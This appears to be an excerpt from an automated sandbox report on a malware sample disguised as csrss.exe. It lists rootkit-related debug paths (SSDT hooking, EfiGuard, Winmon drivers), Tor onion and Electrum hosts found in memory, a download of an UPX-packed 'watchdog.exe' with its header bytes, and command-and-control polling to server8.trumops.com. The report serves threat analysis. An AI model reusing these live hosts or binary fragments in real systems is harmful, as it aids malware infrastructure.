Source:	Binary string: The module signature does not match with .pdb signature. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: .pdb.dbg source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: symsrv.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: dbghelp.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp

Networking:

Found Tor onion address

Show sources

Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Nov 2021 00:57:46 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 3465Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mUdca%2FhPVx%2BcuIN0mD4co%2Fq%2B%2FeXbPU6Zq0S%2FW1p4uyl4SjDH8JZzFzI5IDyMwm0EeLJ8hLsHyRpILoj74RMKgCuPLLbsz17avF1sdGfbIzhrwOIhomElDn412zdD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6ac39180d8125c92-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M

Source: global traffic	HTTP traffic detected: POST /api/poll HTTP/1.1Host: server8.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Length: 652Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /api/poll HTTP/1.1Host: server8.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0Content-Length: 668Accept-Encoding: gzip

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 00:57:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bKtxxp476cwRWpL7PMsiOEiUQCqwyb3bZEaJ0AAlC%2FT9jGwQdvS7Se%2BfmHEOErvcAP%2B4zdZUYVGNLmzkEYvbf2eQj3YtbAsdfhB5eIGhFyxOPCEF4oO6j5HX%2FobEjzLNcm0pI2mw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac39101ef046927-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 00:57:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=gv8mampiuh95qf18cj0go9m89u; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBPQOW%2BDKJcfajEWjUAp5sEAC%2F%2FnnEUjdXStK%2Byc0Yn65mfutwtYjwiIq%2BUlGvNK0I8GjSutN%2BRWb2fq4knditxLDLYpwlGC1tM5sB3%2F2PrElhih1ODR82MTA1P9qvUN7SYUkd8C"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac39121ec73701b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
